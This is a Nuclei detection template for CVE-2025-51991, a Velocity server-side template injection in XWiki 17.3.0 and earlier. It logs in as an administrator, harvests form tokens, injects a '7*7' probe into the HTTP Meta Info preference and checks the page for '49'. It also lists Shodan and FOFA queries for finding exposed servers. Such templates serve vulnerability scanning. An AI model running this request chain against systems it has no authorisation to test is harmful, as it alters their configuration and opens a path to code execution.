id: CVE-2025-51991 info: name: XWiki <= 17.3.0 - Server-Side Template Injection (SSTI) author: 0x_Akoko severity: critical description: | XWiki <= 17.3.0 contains a server-side template injection caused by improper validation of Apache Velocity template code in the Administration interface HTTP Meta Info field, letting authenticated administrators execute arbitrary template logic. impact: | Authenticated administrators can execute arbitrary template logic, potentially exposing internal server information or enabling remote code execution. remediation: | Update to a version later than 17.3.0 or the latest available version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-51991 - https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51991.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2025-51991 epss-score: 0.03653 epss-percentile: 0.88073 cwe-id: CWE-94 metadata: max-request: 5 verified: true vendor: xwiki product: xwiki shodan-query: http.html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: xwiki,ssti,template-injection,authenticated flow: http(1) && http(2) && http(3) && http(4) && http(5) http: - raw: - | GET /bin/login/XWiki/XWikiLogin HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: login_token internal: true regex: - 'name="form_token" value="([^"]+)"' group: 1 - raw: - | POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}} matchers: - type: dsl dsl: - status_code == 302 - contains(location, '/bin/view/Main/') condition: and internal: true - raw: - | GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin§ion=Presentation HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: form_token internal: true regex: - 'data-xwiki-form-token="([^"]+)"' group: 1 - raw: - | POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=%23set%28%24x%3D7%2A7%29%24x&XWiki.XWikiPreferences_0_webcopyright=&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save matchers: - type: dsl dsl: - status_code == 302 internal: true - raw: - | GET /bin/view/XWiki/XWikiPreferences HTTP/1.1 Host: {{Hostname}} redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code == 200' - 'regex("XWikiPreferences\"[^>]*>\\s*49\\s*<", body)' condition: and # digest: 4a0a0047304502200c061f8eb9f6bb099ce8868e0963431228105d1fbdf823bcbd0452dfba5256b8022100dfe9c91e95cbfed372e9197554c7e29d12b34c24f2967af994dd89392a328ab9:922c64590222798bb761d5b6d8e72950